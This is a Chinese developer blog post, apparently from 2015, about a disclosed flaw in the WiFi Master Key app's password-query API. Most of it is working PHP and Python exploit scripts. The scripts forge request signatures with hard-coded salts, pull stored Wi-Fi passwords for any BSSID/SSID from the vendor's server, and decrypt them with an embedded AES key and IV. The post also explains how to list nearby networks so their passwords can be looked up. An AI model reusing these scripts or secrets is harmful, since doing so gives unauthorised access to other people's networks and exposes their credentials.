WIFI万能钥匙密码查询接口

发布时间:August 11, 2015 // 分类:开发笔记,工作日志,PHP,windows // 5 Comments

拜读了《WIFI万能钥匙密码查询接口算法破解(可无限查询用户AP明文密码)》http://www.wooyun.org/bugs/wooyun-2015-099268一文

通过程序包分析算法(说一下在,各种key,salt明文存储,连混淆哪怕是字符拼接都没有。。。)

这个是查询密码用到的数据包,以及参数中sign(签名)的算法,其实就是这些数据进行排序后用salt算个md5。新版本的万能钥匙还有个retSn,实现链式认证,也能突破,但这个报告只说1.x版本的API问题(1.x时代很多细节明显没有考虑完善,基本只靠sign做安全)

<?php
//some code from http://www.wooyun.org/bugs/wooyun-2015-099268
$bssid = "c8:3a:35:fa:b8:80";
$ssid = "Podinns2F03";

if(isset($bssid) && isset($ssid)){
//update salt
    $ret = request($bssid, $ssid, md5(rand(1, 10000)));
    $ret = json_decode($ret);

    $ret = request($bssid, $ssid, $ret->retSn);
    $ret = json_decode($ret);
    if($ret->retCd == 0){
        if($ret->qryapwd->retCd == 0){
            $list = $ret->qryapwd->psws;
            foreach($list as $wifi){
                echo 'SSID: '.$wifi->ssid."\n";
                echo 'PWD: '.decryptStrin($wifi->pwd)."\n";
                echo 'BSSID: '.$wifi->bssid."\n";
                if($wifi->xUser){
                    echo 'xUser: '.$wifi->xUser."\n";
                    echo 'xPwd: '.$wifi->xPwd."\n";
                }
            }
        }
        else{
            echo $ret->qryapwd->retMsg;
        }
    }
}
function request($bssid, $ssid, $salt, $dhid = 'ff8080814cc5798a014ccbbdfa375369'){
    $data = array();
    $data['appid'] = '0008';
    $data['bssid'] = $bssid;
    $data['chanid'] = 'gw';
    $data['dhid'] = $dhid;
    $data['ii'] = '609537f302fc6c32907a935fb4bf7ac9';
    $data['lang'] = 'cn';
    $data['mac'] = '60f81dad28de';
    $data['method'] = 'getDeepSecChkSwitch';
    $data['pid'] = 'qryapwd:commonswitch';
    $data['ssid'] = $ssid;
    $data['st'] = 'm';
    $data['uhid'] = 'a0000000000000000000000000000001';
    $data['v'] = '324';
    $data['sign'] = sign($data, $salt);

    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd');
    curl_setopt($curl, CURLOPT_USERAGENT,'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))');
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); 
    curl_setopt($curl, CURLOPT_POST, true); // enable posting
    curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($data)); // post images 
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload
    $r = curl_exec($curl); 
    curl_close($curl);
    return $r;
}

function registerNewDevice(){
    $salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3Nj#1Aa$';

    $data = array();
    $data['appid'] = '0008';
    $data['bssid'] = $bssid;
    $data['chanid'] = 'gw';
    $data['dhid'] = $dhid;
    $data['ii'] = '609537f302fc6c32907a935fb4bf7ac9';
    $data['lang'] = 'cn';
    $data['mac'] = '60f81dad28de';
    $data['method'] = 'getDeepSecChkSwitch';
    $data['pid'] = 'qryapwd:commonswitch';
    $data['ssid'] = $ssid;
    $data['st'] = 'm';
    $data['uhid'] = 'a0000000000000000000000000000001';
    $data['v'] = '324';
    $data['sign'] = sign($data, $salt);
}

function sign( $array , $salt ){
    // 签名算法
    $request_str = '';
    // 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort 
    ksort( $array );
    foreach ($array as $key => $value) {
        $request_str .= $value;
    }
    $sign = md5( $request_str . $salt );
    return strtoupper($sign);
}

function decryptStrin($str,$keys='k%7Ve#8Ie!5Fb&8E',$iv='y!0Oe#2Wj#6Pw!3V',$cipher_alg=MCRYPT_RIJNDAEL_128){
    //Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密
    //[length][password][timestamp]
    $decrypted_string = mcrypt_decrypt($cipher_alg, $keys, pack("H*",$str),MCRYPT_MODE_CBC, $iv);
    return substr(trim($decrypted_string),3,-13);
}
?>

说明:如何查看附近的WIFI

powershell或者cmd执行netsh wlan show network mode=bssid,将结果粘贴进去

air用户则

执行airport -s,将结果粘贴进去
如果提示没有airport,先执行
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport

我们qu查询huipu那个~

附上一个PYTHON查询脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author: iswin

from Crypto.Cipher import AES
import base64
import requests
import hashlib
import random
import json
import sys

def request(bssid,ssid,salt):
    url='http://wifiapi02.51y5.net/wifiapi/fa.cmd'
    headers={'useg_agent':'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))'}
    data={'appid':'0008','bssid':bssid,'chanid':'gw','dhid':'ff8080814cc5798a014ccbbdfa375369','ii':'609537f302fc6c32907a935fb4bf7ac9','lang':'cn','mac':'60f81dad28de','method':'getDeepSecChkSwitch','pid':'qryapwd:commonswitch','ssid':ssid,'st':'m','uhid':'a0000000000000000000000000000001','v':'324'}
    data['sign']=md5(''.join([data[k] for k in sorted(data.keys())]),salt).upper()
    return requests.post(url,data, headers=headers).text

def md5(str,salt):
    m = hashlib.md5()   
    m.update(str+salt)
    return m.hexdigest() 

def decrypt(data):
    PADDING = '\0'
    key = 'k%7Ve#8Ie!5Fb&8E'
    iv = 'y!0Oe#2Wj#6Pw!3V'
    recovery = AES.new(key, AES.MODE_CBC, iv).decrypt(str(bytearray.fromhex(data)))
    return recovery.rstrip(PADDING)[3:-13]

if __name__ == '__main__':
    if(len(sys.argv)<2):
        print 'python wifi.py bssid ssid\nExample:python wifi.py c8:3a:35:fa:b8:80 Podinns2F03'
        exit()
    try:
        bssid=sys.argv[1]
        ssid=sys.argv[2]
        retSn=json.loads(request(bssid,ssid,md5(str(random.randint(1, 100000)),'')))['retSn']
        response=json.loads(request(bssid,ssid,retSn))
        if int(response['qryapwd']['retCd']) !=0:
            print 'ERROR:'+response['qryapwd']['retMsg']
            exit()
        password=response['qryapwd']['psws'][bssid]['pwd']
        print 'ssid:%s\nbssid:%s\npasswd:%s'%(ssid,bssid,decrypt(password))
    except KeyError:
        print 'ERROR:BSSID('+bssid+') NOT FOUND'
    

标签:none

已有 5 条 关于 " WIFI万能钥匙密码查询接口 "的评论.

  1. 你好,我搜到你的这篇文章。请问 registerNewDevice 新设备注册部分是未写完吗?

    1. 写完了的啊.实际测试时可以使用的

    2. 写完了的啊.实际测试时可以使用的

  2. luoye luoye

    接口挂了......

  3. Tony Tony

    registerNewDevice确实挂了。

添加新评论 »

分类
最新文章
最近回复
  • 轨迹: niubility!
  • 没穿底裤: 好办法..
  • emma: 任务计划那有点小问题,调用后Activation.exe不是当前活动窗口,造成回车下一步下一步...
  • 没穿底裤: hook execve函数
  • tuhao lam: 大佬,还有持续跟进Linux命令执行记录这块吗?通过内核拦截exec系统调用的方式,目前有没有...